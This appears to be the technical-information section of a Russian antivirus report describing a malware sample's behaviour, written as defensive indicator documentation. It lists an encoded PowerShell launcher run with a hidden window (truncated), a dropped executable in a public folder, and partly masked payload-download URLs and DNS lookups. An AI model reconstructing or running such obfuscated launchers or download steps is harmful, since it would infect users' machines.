Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KABuAGUAdwAtAG8AYgBKAGUAQwBUACAAIABJAE8ALgBDAG8ATQBwAFIARQBzAHMAaQBPAE4ALgBkAGUARgBMAGEAdABFAFMAdABSAEUAYQBNACgAWwBJAE8ALgBtAEUAbQBvAFIAWQBTAHQAcgBFAEEATQBdACAAWwBjAG8AbgBWAGUAcgB0AF0AOgA6AG...
- C:\users\public\203248.exe
- C:\users\public\203248.exe
- C:\users\public\203248.exe
- 'wb###r.com.br':80
- 'jo####dutton.com':80
- 'ar###man.com':80
- 'se##eus.se':80
- http://wb###r.com.br/YT3PpM/
- http://jo####dutton.com/fOQoZ6/
- http://ar###man.com/22nSfz/
- http://se##eus.se/cSIkA8/
- DNS ASK wb###r.com.br
- DNS ASK jo####dutton.com
- DNS ASK ar###man.com
- DNS ASK se##eus.se
- DNS ASK vf##b.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KABuAGUAdwAtAG8AYgBKAGUAQwBUACAAIABJAE8ALgBDAG8ATQBwAFIARQBzAHMAaQBPAE4ALgBkAGUARgBMAGEAdABFAFMAdABSAEUAYQBNACgAWwBJAE8ALgBtAEUAbQBvAFIAWQBTAHQAcgBFAEEATQBdACAAWwBjAG8AbgBWAGUAcgB0AF0AOgA6AG...' (со скрытым окном)